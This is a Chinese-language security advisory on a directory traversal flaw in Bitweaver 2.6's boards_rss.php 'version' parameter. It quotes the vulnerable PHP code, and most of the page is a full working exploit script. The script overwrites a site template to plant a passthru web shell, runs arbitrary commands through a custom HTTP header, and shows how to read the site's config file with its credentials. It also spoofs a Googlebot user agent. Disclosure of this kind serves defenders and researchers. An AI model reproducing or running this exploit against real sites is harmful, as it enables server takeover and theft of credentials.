安全研究
安全漏洞
Bitweaver version参数目录遍历漏洞
发布日期:2009-05-12
更新日期:2009-05-13
受影响系统:
Bitweaver Bitweaver <= 2.6描述:
BUGTRAQ ID: 34910
CVE(CAN) ID: CVE-2009-1678,CVE-2009-1677
Bitweaver是免费的开源web应用框架和内容管理系统。
Bitweaver的boards/boards_rss.php模块没有正确地过滤对version参数所传送的输入便用于创建文件:
...
echo $rss->saveFeed( $rss_version_name, $cacheFile );
...
以不安全方式调用了saveFeed()函数,基于$_REQUEST[version]变量的参数可能包含有目录遍历序列。
在/rss/feedcreator.class.php的saveFeed()函数中:
...
function saveFeed($filename="", $displayContents=true) {
if ($filename=="") {
$filename = $this->_generateFilename();
}
if ( !is_dir( dirname( $filename ))) {
mkdir_p( dirname( $filename ));
}
$feedFile = fopen($filename, "w+");
if ($feedFile) {
fputs($feedFile,$this->createFeed());
fclose($feedFile);
if ($displayContents) {
$this->_redirect($filename);
}
} else {
echo "<br /><b>Error creating feed file, please check write permissions.</b><br/>"; }
}
}
...
无论php.ini设置如何,用户都可以创建任意文件夹、覆盖文件,还可以以任意扩展名结束路径。
<*来源:bookoo
链接:http://secunia.com/advisories/35057/
http://marc.info/?l=bugtraq&m=124213918429416&w=2
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
$err[0] = "[!] This script is intended to be launched from the cli!";
$err[1] = "[!] You need the curl extesion loaded!";
if (php_sapi_name() <> "cli") {
die($err[0]);
}
if (!extension_loaded('curl')) {
$win = (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') ? true :
false;
if ($win) {
!dl("php_curl.dll") ? die($err[1]) :
nil;
} else {
!dl("php_curl.so") ? die($err[1]) :
nil;
}
}
function syntax() {
print (
"Syntax: php ".$argv[0]." [host] [path] [user] [pass] [cmd] [options] \n". \
"Options: \n". \
"--port:[port] - specify a port \n". " \
default->80 \n". "--proxy:[host:port] - use \
proxy \n". "Examples: php ".$argv[0]." \
192.168.0.1 /bitweaver/ bookoo pass ls \n". " php ".$argv[0]." \
192.168.0.1 / bookoo pass ls -a --proxy:1.1.1.1:8080\n". " php \
".$argv[0]." 192.168.0.1 / bookoo pass cat ../kernel/config_inc.php --port:81"); \
die(); }
error_reporting(E_ALL);
$host = $argv[1];
$path = $argv[2];
$_usr = $argv[3];
$_pwd = $argv[4];
$_cmd = "";
for ($i = 5; $i < $argc; $i++) {
if ((!strstr($argv[$i], "--proxy:")) and (!strstr($argv[$i], "--port:"))) {
$_cmd .= " ".$argv[$i];
}
}
$argv[5] ? print("[*] Command->$_cmd\n") :
syntax();
$_use_proxy = false;
$port = 80;
for ($i = 3; $i < $argc; $i++) {
if (stristr($argv[$i], "--proxy:")) {
$_use_proxy = true;
$tmp = explode(":", $argv[$i]);
$proxy_host = $tmp[1];
$proxy_port = (int)$tmp[2];
}
if (stristr($argv[$i], "--port:")) {
$tmp = explode(":", $argv[$i]);
$port = (int)$tmp[1];
}
}
function _s($url, $cmd, $is_post, $request) {
global $_use_proxy, $proxy_host, $proxy_port, $cookie;
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
if ($is_post) {
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $request."\r\n");
}
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_USERAGENT, "Googlebot/1.0 (googlebot@googlebot.com \
http://googlebot.com/)"); curl_setopt($ch, CURLOPT_TIMEOUT, 0);
curl_setopt($ch, CURLOPT_HEADER, 1);
$headers = array("Cookie: $cookie", "Cmd: ".$cmd." > ./../readme");
curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
if ($_use_proxy) {
curl_setopt($ch, CURLOPT_PROXY, $proxy_host.":".$proxy_port);
}
$_d = curl_exec($ch);
if (curl_errno($ch)) {
die("[!] ".curl_error($ch)."\n");
} else {
curl_close($ch);
}
return $_d;
}
$my_template = "themes/templates/footer_inc.tpl";
$url = "http://$host:$port".$path."boards/boards_rss.php";
$_o = _s($url, "", 0, "");
if (stristr($_o, "404 Not Found")) {
die ("[!] Vulnerable script not found!\n");
}
//catch site cookie, this is needed for version compatibility, not needed in \
2.6.0 $_tmp = explode("Set-Cookie: ", $_o);
$cookie = "";
for ($i = 1; $i < count($_tmp); $i++) {
$_tmpii = explode(";", $_tmp[$i]);
$cookie .= $_tmpii[0]."; ";
}
print("[*] Cookie->".$cookie."\n");
$_o = _s($url, "", 1, "version=/\x00&");
$_o = _s($url, "", 1, "u=$_usr&p=$_pwd&version=/../../../../$my_template\x00&");
if (stristr($_o, "<?xml version=\"1.0\" encoding=\"UTF-8\"?>")) {
print ("[*] '$my_template' successfully overwritten!\n");
} else {
print($_o);
die("[!] Error! No write permission on /".$my_template." ...");
}
if (stristr($_o, "{php}passthru(\$_SERVER[HTTP_CMD]);{/php}")) {
print ("[*] Shell injected!\n");
} else {
print($_o);
die("[!] Error! Shell not injected!");
}
$url = "http://$host:$port".$path."wiki/index.php";
$_o = _s($url, $_cmd, 0, "");
$url = "http://$host:$port".$path."readme";
$_o = _s($url, "", 0, "");
if (stristr($_o, "404 Not Found")) {
die ("[!] stdout file not found!\n");
} else {
print("[*] Success!\n".$_o);
}
?>
建议:
厂商补丁:
Bitweaver
---------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.bitweaver.org/
浏览次数:2550
严重程度:0(网友投票)
绿盟科技给您安全的保障